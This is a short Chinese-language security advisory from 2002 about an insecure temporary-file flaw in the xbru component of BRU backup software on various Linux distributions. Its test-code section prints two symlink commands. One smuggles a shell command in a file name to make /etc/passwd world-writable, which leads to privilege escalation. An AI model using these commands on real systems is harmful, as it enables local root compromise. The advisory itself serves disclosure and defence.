BRU XBRU临时文件建立不安全问题

发布时间：2002-09-20
更新时间：2002-09-20
严重程度：高
威胁程度：权限提升
错误类型：访问验证错误
利用方式：服务器模式

BUGTRAQ ID：5708

受影响系统

Tolis Group BRU 17.0 Linux
   - Caldera OpenLinux Server 3.1
   - Caldera OpenLinux Workstation 3.1
   - Debian Linux 2.2 IA-32
   - MandrakeSoft Linux Mandrake 8.0
   - MandrakeSoft Linux Mandrake 8.1
   - MandrakeSoft Linux Mandrake 8.1 ia64
   - RedHat Linux 7.0 i386
   - RedHat Linux 7.1 i386
   - RedHat Linux 7.1 ia64
   - RedHat Linux 7.2 i386
   - RedHat Linux 7.2 ia64
   - S.u.S.E. Linux 7.1 x86
   - S.u.S.E. Linux 7.2 i386
   - S.u.S.E. Linux 7.3 i386

详细描述
BRU是Tolis Group开发的备份和恢复工具，此问题影响LINUX操作系统。

xbru在执行前检查临时文件的存在，本地用户可以建立符号连接到其他系统文件，当执行时可以BRU用户权限覆盖。由于BRU一般以ROOT用户运行，所以可导致破坏系统任意文件。

测试代码
ln -s /tmp/clobber /tmp/xbru_dscheck.dd

ln -s /etc/log.d/scripts/logfiles/xferlog/'`cd etc;chmod 666 passwd #`' /tmp/xbru_dscheck.dd

解决方案
尚无

相关信息
<prophecy@prophecy.net.nz>.
参考：http://online.securityfocus.com/archive/1/291775
http://online.securityfocus.com/archive/1/291799

最近严重漏洞

BRU XBRU临时文件建立不安全问题